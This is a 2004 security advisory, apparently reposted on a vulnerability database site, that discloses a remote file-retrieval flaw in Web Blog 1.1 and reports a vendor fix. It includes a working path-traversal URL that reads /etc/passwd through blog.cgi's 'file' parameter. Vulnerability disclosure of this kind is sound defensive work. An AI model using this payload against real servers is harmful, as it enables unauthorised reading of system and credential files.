Lucene search

ZH2004-01SA.txt

🗓️ 28 Jan 2004 00:00:00Reported by ZetaLabsType

packetstorm🔗 packetstormsecurity.com👁 12 Views

Web Blog 1.1 vulnerability allows remote file retrieval from web server.

`  
  
ZH2004-01SA (security advisory): Web Blog 1.1 Remote arbitrary files retrieving  
  
Published: 28 january 2004  
  
Released: 28 january 2004  
  
Name: Web Blog  
  
Affected Systems: 1.1  
  
Issue: Remote file retrieving  
  
Author: Zone-h Security Labs  
  
Vendor: http://leifwright.com  
  
  
Description  
  
***********  
  
Zone-h Security Team has discovered a flaw in Web Blog 1.1. There is a vulnerability in the current version of Web Blog that allows an attacker to retrieve arbitrary files from the webserver with its priviledges.  
Web Blog is an application to manage blogs.  
  
  
Details  
  
*******   
  
  
It's possibile for a remote attacker to retrieve any file from a webserver.  
  
For example try this:  
  
http://address/directory/blog.cgi?submit=ViewFile&month=[month]&year=[year]&file=/../../../../../../../../../../../../../../../../etc/passwd  
  
  
  
  
Solution:  
  
*********  
  
The vendor has been contacted and a new version was released.  
  
  
  
  
Zone-h Security Labs - [email protected]  
  
http://www.zone-h.org/en/advisories/read/id=3822/  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

28 Jan 2004 00:00Current

7.4High risk

Vulners AI Score7.4

web blog vulnerability remote file retrieval security advisory zone-h security labs